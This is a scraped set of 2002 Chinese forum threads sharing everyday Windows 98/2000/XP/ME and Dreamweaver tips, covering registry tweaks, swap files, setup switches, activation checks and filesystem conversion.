    特别是在win2k的安装驱动的过程中，n次的重启与每一次的漫长的等待，怎么办？也许你回说，先不要求重启，但是对于一些自动安装的驱动，比如一个主板光盘里带有声卡的驱动，他们会在重启时自动安装，如果你不要求重启，你必须要手动安装声卡的驱动，在光盘目录里漫无某地的寻找，很痛苦。解决的办法是，注销了，在win2k及win98里看起来都很棒。

    生活的意思全在于你一直坚持的一念之间，存在如何，消失如何。
    ==================
    学好生化，学好JAVA，将在一年后实现。
    深空

    终级用户
    积分：1023
    发帖：1008
    来自：福建漳浦→西安
    注册：2002-03-09
             发表于 2002-06-18 18:54:20 按此观看深空的个人资料 按此发邮件给深空 访问深空的主页 深空 的 oicq 是65937539,查看 65937539 的资料 发送悄悄话给深空 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看深空的IP
    呵呵，说个QQ隐身登陆的笨办法：）
    在网吧上网，如果直接从注册向导登陆的话QQ是上线登陆的，可是有时候却不希望现身，怎样实现隐身登陆呢？

    就是拿一个没用的QQ先从注册向导登陆了，然后在系统参数中选中以隐身方式登陆，点确定，然后直接在这个QQ上运行注册向导登陆你要登陆的QQ，你会发现现在QQ是隐身的了。

    还有QQ上的信息提取热键你用了没有呢？在系统参数里面设置自定义热键吧，我用的都是alt+z和alt+x两个，这样即使鼠标在忙的时候也可以用热键提取信息了

    [这消息被深空编辑过(编辑时间2002-06-18 19:02:46)]

    我在刹那｜划破夜的胸膛｜只為牽絆｜你不經意投射的目光｜
    哪怕燃盡｜所有光芒｜只要你在瞬間｜朝著我墜落的方向凝望............
    歡迎光臨月光海岸
    西南变选

    超级用户
    积分：418
    发帖：687
    来自：CQ.CN
    注册：2002-02-05
             发表于 2002-06-18 20:40:47 按此观看西南变选的个人资料 按此发邮件给西南变选 西南变选 的 oicq 是13624892,查看 13624892 的资料 发送悄悄话给西南变选 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看西南变选的IP
    关机我都是直接按灯泡，行不行哟？

    拜个师,学个艺,天生聪慧，刻苦好学，任劳任怨，任打任骂,不知道那位高人有收徒意向,请速速联系我!

    lovewulong

    高级用户
    积分：277
    发帖：107
    来自：广东
    注册：2002-04-10
             发表于 2002-06-18 21:03:03 按此观看lovewulong的个人资料 按此发邮件给lovewulong 访问lovewulong的主页 lovewulong 的 oicq 是29707893,查看 29707893 的资料 发送悄悄话给lovewulong 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lovewulong的IP
    楼上的那当然行：）不过.....

    新建个快捷方式
    目标指向下面这行
    即可实现快速关机

    C:\WINDOWS\RUNDLL32.EXE user,ExitWindows

    win9x下通过

    我一直在很努力地学习
    只不过方向错了

    Kennedy

    初级用户
    积分：120
    发帖：44
    来自：四川
    注册：2001-07-15
             发表于 2002-06-18 21:06:32 按此观看Kennedy的个人资料 按此发邮件给Kennedy Kennedy 的 oicq 是11153341,查看 11153341 的资料 发送悄悄话给Kennedy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Kennedy的IP
    win98改ip不重起的办法：
    1。改完ip选择取消。
    2。在设备管理器里禁用改了ip的那块网卡。
    3。启用网卡。
    ok，你改的ip已经可以用了。

    DO MY BEST!
    马蜂

    在绿色中飞翔
    积分：1727
    发帖：515
    来自：你对这个世界的理解
    注册：2002-02-24
             发表于 2002-06-19 13:18:34 按此观看马蜂的个人资料 按此发邮件给马蜂 访问马蜂的主页 马蜂 的 oicq 是22324699,查看 22324699 的资料 发送悄悄话给马蜂 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看马蜂的IP
    关于DW字体的完整解决方案（FAQ版）
    1.为什么在code view中的字体，比较难看？
    因为，在dw中默认的字体是什么，，看看就知道了。

    这些用来显示英文代码是不合适的。
    2.为什么我的修改只能暂时生效？
    这应该是dw的一个bug，在dwMX中已经得到改善。在dw4中的解决方法是定位到Font Preferences中修改Number Encodings为12，再修改注册表就可以。
    3.Font Preferences如何去定位？
    地球人都知道的：HKEY-CURRENT-USER//SOFTWARE//MACROMEDIA//DREAMWEAVER//FONT PREFERENCES//..
    这个只在2k中有效的。
    我知道的：打开注册表，ctrl+f，填入font preferences，可以自动定位到了，在98与2k中都很有效。
    4.为什么我不能发现font preferences的子项？
    也就是在font preference中没有任何东西，主要上你没有修改字体项，自然是什么也没有生成。打开dw，定位到EDIT--PREFERECES--FONTS，先随便选几个，再次打开注册表就可以发现了。
    5.为什么修改的字体不能完全包含系统中的字体？
    因为你选的是中文内码，只有有限的中文字体和系统字体可以被很好的显示，如果你喜欢的arial，verdana，tahoma不能显示，而又很想用，就只好用修改注册表。
    6.如何使用任意的字体？
    定位到HKEY-CURRENT-USER//SOFTWARE//MACROMEDIA//DREAMWEAVER//FONT PREFERENCES//CHARENCODING-11..
    可以看到这个：

    根据需要，自己选择，注意，使用英文字体的时候，要将charCode设为0。不过有时侯可能因为半角和全角，而引起乱码，我的做法是将他们一律设为tahoma,不用修改chatCode,
    出现乱码的机会少多了。
    最后给出一个成功的结果吧：-）其实很简单--->
    注册表:

    结果:

    生活的意思全在于你一直坚持的一念之间，存在如何，消失如何。
    ==================
    学好生化，学好JAVA，将在一年后实现。
    epie

    终级用户
    积分：1113
    发帖：305
    来自：苏州|哈尔滨
    注册：2001-09-14
             发表于 2002-06-19 14:25:11 按此观看epie的个人资料 按此发邮件给epie 访问epie的主页 epie 的 oicq 是1491135,查看 1491135 的资料 发送悄悄话给epie 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看epie的IP
    我来凑凑热闹

    技巧类
    1.2000和xp下运行"cmd"，进入dos窗口，复制和粘贴都用右键完成

    2.收藏夹不要放在系统盘，以免忘了备份，每次装完系统用"超级魔法兔子“指定路径

    3.对于系统不明白的地方，平时多看windows自带的帮助，不要盲目去找人解决，也许帮助才是最快和最全的。（其余软件也是同理）

    4.winxp自带批量重命名功能，只要选中一堆文件，选重命名，然后改第一个文件，改完后，其他文件也会自动修改

    软件类
    1.保存网页时，可以用elib 或网海拾贝，保存方便，易于整理。

    2.一个实用免费软件winbar
    http://www.winbar.nl/
    以任务栏的形式，时刻监视系统性能（监视内容包括cpu,内存，硬盘，还有附带的一些功能如google等）,免得当你发现系统慢时才去"ctrl+del+alt"查看系统性能，往往那时系统已经慢得很难再打开窗口了

    3.浏览网页建议用内嵌ie的浏览器，速度快，而且具有ie的一切功能

    4.软件装太多，桌面放不下图标，可以用True launch bar

    http://www.truelaunchbar.com/
    管理方便，还你一个简洁的桌面

    [这消息被epie编辑过(编辑时间2002-06-19 18:14:11)]

    www.epie.net
    若是有空的话，注册个用户吧
    这个主题共有2页：1 2 上一贴 | 下一贴
    快速回复 主题：＠好技巧、新发现(欢迎大家参与)！
    显示名字： 啸 [ 退出 ]
    消息图标：

    内容
    * HTML 代码关闭
    * UBB　代码开启
    * 笑脸转换一点通

    * html代码调试方法:
    [html]……[/html]


c盘下面白白多出一个win386.swp文件 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
c盘下面白白多出一个win386.swp文件

上一贴 | 下一贴
发表人 主题: c盘下面白白多出一个win386.swp文件
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2002-01-20 00:40:28 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 收藏该主题供以后查看 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP

c盘下面白白多出一个win386.swp文件，删不掉，100多兆，请问这是什么文件啊，怎么删除？

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
Quaden

终级用户
积分：526
发帖：194
来自：China.Beijin
注册：2001-11-23
 发表于 2002-01-20 00:50:07 按此观看Quaden的个人资料 按此发邮件给Quaden Quaden 的 oicq 是1292510,查看 1292510 的资料 发送悄悄话给Quaden 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Quaden的IP
这是windows的临时交换文件，在你的c:\windows目录下，没有必要删，关机时自动删除。

破釜沉舟百二秦关终属楚，卧薪尝胆三千越甲可吞吴
阿修罗飞天舞

无关风月
现任版主
积分：2516
发帖：2473
来自：杭州
注册：2001-05-21
 发表于 2002-01-20 02:07:42 按此观看阿修罗飞天舞的个人资料 按此发邮件给阿修罗飞天舞 阿修罗飞天舞 的 oicq 是5194599,查看 5194599 的资料 发送悄悄话给阿修罗飞天舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿修罗飞天舞的IP
这是虚拟内存的设置大小
具体你看看这个文章吧
http://tech.sina.com.cn/s/1049.html

坐看秋草只须臾 秋夕惊鸿往日情 不忍萧瑟枯原景 思思念念无日月
随风散去荻上露 薄暮伤别彷若梦 秋日难留故人心 今年今生今日尽

Blueidea Web Team

arrive

终级用户
积分：1298
发帖：433
来自：大连
注册：2000-12-02
 发表于 2002-01-20 11:13:08 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
禁用虚拟内存，
然后删除！
留着不碍事吧？

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
中国坛中文网——网络技术版www.chinafen.com
yesbest

初级用户
积分：134
发帖：37
来自：宿州，安徽，中国
注册：2002-01-20
 发表于 2002-01-20 11:34:49 按此观看yesbest的个人资料 按此发邮件给yesbest 访问yesbest的主页 yesbest 的 oicq 是9099711,查看 9099711 的资料 发送悄悄话给yesbest 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yesbest的IP
这个文件是用于windows虚拟内存转换的文件，不必要删的，你删也删不掉，关机了自己就会删掉

kelvinfeel@163.com
/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2002-01-20 16:01:49 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
多谢

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-01-20 20:12:53 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
如果你手动设置虚拟内存，就会有这个文件存在。而且是你设置多大，文件就多大。

改成让WINDOWS自己管理虚拟内存，这个文件就没有了。

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

/一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2002-01-20 22:42:15 按此观看/一般拉傻的个人资料 按此发邮件给/一般拉傻 访问/一般拉傻的主页 发送悄悄话给/一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看/一般拉傻的IP
是啊，我也是才知道，听说自己设成内存的25倍可以加快运行速度。

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-21 13:13:08 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
/一般拉傻在上个帖子中说
引用:
是啊，我也是才知道，听说自己设成内存的25倍可以加快运行速度。

25？？？
是2.5吧，呵呵~~

::古落根门::

唯有不断学习 才能不断进步

Sam

超级用户
积分：367
发帖：113
来自：Henan
注册：2000-08-27
 发表于 2002-01-22 08:26:25 按此观看Sam的个人资料 该用户不允许显示它的电子邮件 访问Sam的主页 Sam 的 oicq 是1320727,查看 1320727 的资料 发送悄悄话给Sam 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Sam的IP
windows虚拟内存转换的文件，想删除也可以，将设置为windows自动管理虚拟内存就可以了，根目录下的可以删除了，但是在WINDOWS目录回会自动又生成一个了。

这样你眼不见也心不烦了！

Learn to be still in this world!
晓宇

高级用户
积分：300
发帖：113
来自：向阳坊37号
注册：2002-01-09
 发表于 2002-01-22 10:07:33 按此观看晓宇的个人资料 按此发邮件给晓宇 访问晓宇的主页 晓宇 的 oicq 是6794255,查看 6794255 的资料 发送悄悄话给晓宇 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看晓宇的IP
小内存用户可以用200M减去物内存数,如64M就设成136M
超过256的高内存就不是很有必要设置虚拟内存,关掉会更快

平凡的生命静静的流走……黑夜洗净城市,今天的阳光如此灿烂,也许明天不再有灿烂的笑颜……
／一般拉傻

高级用户
积分：278
发帖：199
来自：CQ
注册：2001-07-08
 发表于 2002-01-22 16:57:41 按此观看／一般拉傻的个人资料 按此发邮件给／一般拉傻 访问／一般拉傻的主页 ／一般拉傻 的 oicq 是13624892,查看 13624892 的资料 发送悄悄话给／一般拉傻 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看／一般拉傻的IP
那自己设和让它自己管理哪个好些呢？我这样64m

想做一件事
做这件事的益处是显而易见的。
成功后它所来的影响是全世界的历史性进步！
这里需要强调的是“历史性”三个字！
那么，这件事是什么呢？
事成之后即见分晓……
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-22 19:54:08 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
64M还是自己设比较好

::古落根门::

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 主题：c盘下面白白多出一个win386.swp文件
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


WIN98安装程序命令行参数详解. - 经 典 论 坛

计算机技术
WIN98安装程序命令行参数详解.

上一贴 | 下一贴
发表人 | 主题: WIN98安装程序命令行参数详解.
len SlowHorse 积分：1198 发帖：572 来自：hebei 注册：2001-09-29 | 发表于 2002-01-24 12:07:35 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 收藏该主题供以后查看 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP 虽然这段时间WINXP很火,但操作系统用98的朋友还不在少数.对于这些朋友,安装98时运用下面的安装参数,可以实现不同的安装效果,至少可以提高98的安装速度.希望大家用的到. /? 显示帮助信息 /C 安装过程中不使用磁盘高速缓存 /IC 指定在安装完成后的98中不包含现有CONFIG.SYS文件和AUTOEXEC.BAT文件中的如何内容. /ID 在安装过程中不检查剩余磁盘空间 /IE 在安装过程中不创建98启动盘 /IF 采用快速安装方式 /IH 在安装过程中跳过注册表数据库的检查 /IM 在安装过程中不跳过对内存的检查 /IN 在安装过程中不启动98 的网络安装向导 /IQ 跳过交叉文件的检查 /IR 不更新主引导记录 /IS 在安装前不进行磁盘扫描 /NF 文件拷贝工作完成后,重启前不提示用户抽出软盘. /PJ 装入高级配置和电源管理接口程序 /IW 在安装过程中不提示版本信息 /IX 在安装过程中不对字符集检测 /NOSTART 只拷贝98安装程序所必须的最小动态链接库(DLL)文件,然后不予安装直接退出. /SRCDIR 指定98的安装目录 /S:filename 装入指定的SETUP.INI文件进行安装. /T:tempdir 指定用于存放98临时文件的目录. UFO Bulletin Board ====> 不明飞行物
上一贴 | 下一贴
快速回复 主题：WIN98安装程序命令行参数详解.
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


windows me问题~~~~ - 经 典 论 坛

计算机技术
windows me问题~~~~

上一贴 | 下一贴
发表人 | 主题: windows me问题~~~~
summy 初级用户 积分：3 发帖：1 来自： 注册：2002-01-27 | 发表于 2002-01-27 21:15:32 按此观看summy的个人资料 按此发邮件给summy 访问summy的主页 summy 的 oicq 是4537540,查看 4537540 的资料 收藏该主题供以后查看 发送悄悄话给summy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看summy的IP 我一直使用WINME系统 我给C盘分了2G的空间（我的硬盘总共才6。4G啊555。真舍 不得） 可是最近发现即使我禁用了系统还原它还是一天比一天占用的空间大！！！ 昨天在画了一天的PAINTER之后发现磁盘空间从原来的200M猛减到20M！！天哪 而且我用了磁盘清理和文件检查都没有效果！~~~~~~~~~~~~~~~~~~ 高手们 快救救 我吧~~~~~~~~~~~~~~~~~~~ 喵喵喵
浸食·花葬 极度色郎 积分：7812 发帖：2959 来自：|翅膀| 注册：2001-07-09 | 发表于 2002-01-27 21:20:02 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP 没有记错的话 me 里面有个让人讨厌的系统还原~ 具体在什么地方我就不清楚了 幕末 —— 京都に人斬り拔刀齋と呼ばれた志士がぃた. 修羅さながらに人を斬り.その血刀を以って新 時代『明治』を切り拓ぃたその男は.動亂の 終結と共に人々の前から姿を消した ——
盒子 终级用户 积分：1468 发帖：519 来自：BOX 注册：2002-01-09 | 发表于 2002-01-27 21:59:41 按此观看盒子的个人资料 按此发邮件给盒子 盒子 的 oicq 是48660678,查看 48660678 的资料 发送悄悄话给盒子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看盒子的IP 删除不用的程序和组件！查看你C盘的WINDOWS ME的根目录低下有个“_RESTORE"这个隐藏文件夹，这就是ME的系统还原所造成的。如果不用系统还原功能，这个东西可以不要！但是也不好删~呵呵~~教你一个办法：首先在ME中禁用系统还原功能（点右键选择属性，然后打开：性能——文件系统——疑难解答”。然后打开注册表，删除HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSON\RUNSERVICES\下的*STATEMGR项目！重新启动~~就删掉了~~哈哈~~可以省出200多M空间哦！ 我的就是这样删除的~~注册表千万别搞错哦~~在另一个主键下面也有一模一样的*STATEMGR项目！如果删错了那就………………就………………后果自负！HOHO~~如果要删就照我上面给出的路径！（我检查了好几便） 还有一个优化的方法，在系统配置使用程序中，单击环境选项卡，分别选中"TEMP"和“TMP”，点编辑，将变量值改为另一个已存在的文件夹：改到D：\TEMP 这样的话便于清理临时文件，也可以减少文件碎片，同时也可以释放C盘的空间！ 再就是把你不用的WINDOWS组件统统删除！OK~~~~哈哈！ [这消息被盒子编辑过(编辑时间2002-01-27 22:02:20)] [这消息被盒子编辑过(编辑时间2002-01-27 22:07:50)] 学会忍耐！
上一贴 | 下一贴
快速回复 主题：windows me问题~~~~
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


2000怎么加速访问局域网中的98 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
2000怎么加速访问局域网中的98

上一贴 | 下一贴
发表人 | 主题: 2000怎么加速访问局域网中的98
CrazyParty 群山之巅 积分：2491 发帖：922 来自：温州 注册：2000-10-14 | 发表于 2002-01-22 12:19:07 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 收藏该主题供以后查看 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP 如题，修改注册表的哪里？或者有什么工具？谢谢! 这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
51windows 海娃 积分：4495 发帖：1308 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-01-22 17:13:03 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 国外最新流传开一个小帖士（其实是一个BUG补丁而已），可以令你的Windows 2000浏览速度加快很多哦！大家在通过网络系统浏览共享文件时，大概都会要等上30秒钟。这其实是因为Win 2000的一个设置有个BUG，一定要先在“计划任务”里搜索，再找出共享文件。而我们提到的这个小帖士就是专门修补这个BUG的，如果做一些改动的话，Win 2000的用户就会发现，无论是互联网还是视窗浏览的速度都有了很显著的提高。下面就是具体的方法啦： 打开注册表点击到： HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace 在其分栏出选择键值： {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 然后就删除它。 因为就是这个健值引导Windows去搜索“计划任务”。当然如果你觉得有必要你可以保存下序列号以备不时之需。这个补丁非常有效，不需要重新开机，几乎即刻就可以感受到你的浏览程序快了很多！ 我的网站上就有!去看看 http://202.102.4.31/51windows/windows/2000/ Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 51window_asp_Beta
kacji 终级用户 积分：1014 发帖：299 来自：活火熔城 注册：2001-08-14 | 发表于 2002-01-24 04:32:00 按此观看kacji的个人资料 按此发邮件给kacji kacji 的 oicq 是156679,查看 156679 的资料 发送悄悄话给kacji 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kacji的IP 这个问题微软的官方解释是： 直接在地址栏中输入一个资源的绝对地址，如：\\work1\c\windows 我要让这天，再遮不住我眼 我要让这地，再埋不了我心 我要让众生，都明白我意 我要让诸佛，皆烟消云散
上一贴 | 下一贴
快速回复 主题：2000怎么加速访问局域网中的98
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


如何检测winxp是否激活？ - 经 典 论 坛

计算机技术
如何检测winxp是否激活？

上一贴 | 下一贴
发表人 | 主题: 如何检测winxp是否激活？
高风 终级用户 积分：487 发帖：402 来自：重庆—成都 注册：2001-01-04 | 发表于 2002-01-31 21:03:46 按此观看高风的个人资料 按此发邮件给高风 访问高风的主页 高风 的 oicq 是87468690,查看 87468690 的资料 收藏该主题供以后查看 发送悄悄话给高风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高风的IP 大家有没有用winxp？ 怎么检测知道吗？ 南台静坐一炉香 终日凝然万虑忘 不是息心去妄想 都缘无事可商量 ……………………………………………
Fly Developer 积分：4146 发帖：1028 来自： 注册：2001-10-31 | 发表于 2002-01-31 21:10:03 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP 在命令行输入 oobe/msoobe /a 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
高风 终级用户 积分：487 发帖：402 来自：重庆—成都 注册：2001-01-04 | 发表于 2002-01-31 21:17:09 按此观看高风的个人资料 按此发邮件给高风 访问高风的主页 高风 的 oicq 是87468690,查看 87468690 的资料 发送悄悄话给高风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高风的IP 提示： oobe不是内部或外部命令…… 没用哦！ 南台静坐一炉香 终日凝然万虑忘 不是息心去妄想 都缘无事可商量 ……………………………………………
Fly Developer 积分：4146 发帖：1028 来自： 注册：2001-10-31 | 发表于 2002-01-31 21:21:38 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP 说错了说错了,是运行 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
高风 终级用户 积分：487 发帖：402 来自：重庆—成都 注册：2001-01-04 | 发表于 2002-01-31 21:53:36 按此观看高风的个人资料 按此发邮件给高风 访问高风的主页 高风 的 oicq 是87468690,查看 87468690 的资料 发送悄悄话给高风 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高风的IP 谢谢！ 已经激活！ 南台静坐一炉香 终日凝然万虑忘 不是息心去妄想 都缘无事可商量 ……………………………………………
上一贴 | 下一贴
快速回复 主题：如何检测winxp是否激活？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


如何转换？ - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
如何转换？

上一贴 | 下一贴
发表人 主题: 如何转换？
williams

初级用户
积分：56
发帖：15
来自：
注册：2001-11-03
 发表于 2001-11-29 21:26:05 按此观看williams的个人资料 按此发邮件给williams 收藏该主题供以后查看 发送悄悄话给williams 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看williams的IP
如何在windows2000环境下把FAT变成FAT32?
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2001-11-29 21:54:12 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
FAT不会是系统盘吧，那就看你的盘上有无数据了，有数据的话备份后，可以在计算机管理里格式化。

如果是将系统的FAT32转换成NTFS，可以在命令提示符下输入
convert c: /fs:ntfs /v
之后重启即可转换（不会损失数据）

[这消息被BIGBUG编辑过(编辑时间2001-11-29 22:21:04)]

等我想想再签
williams

初级用户
积分：56
发帖：15
来自：
注册：2001-11-03
 发表于 2001-11-29 23:30:52 按此观看williams的个人资料 按此发邮件给williams 发送悄悄话给williams 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看williams的IP
FAT转换成FAT32后数据会丢失么？
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2001-11-30 18:24:14 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
williams在上个帖子中说
引用:
FAT转换成FAT32后数据会丢失么？

推荐使用PARTITION MAGIC ~ 带数据的任何转换~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

嘿嘿

坏笑
积分：414
发帖：559
来自：
注册：2001-10-06
 发表于 2001-12-06 01:03:44 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
yunbin在上个帖子中说
引用:
williams在上个帖子中说
引用:
FAT转换成FAT32后数据会丢失么？

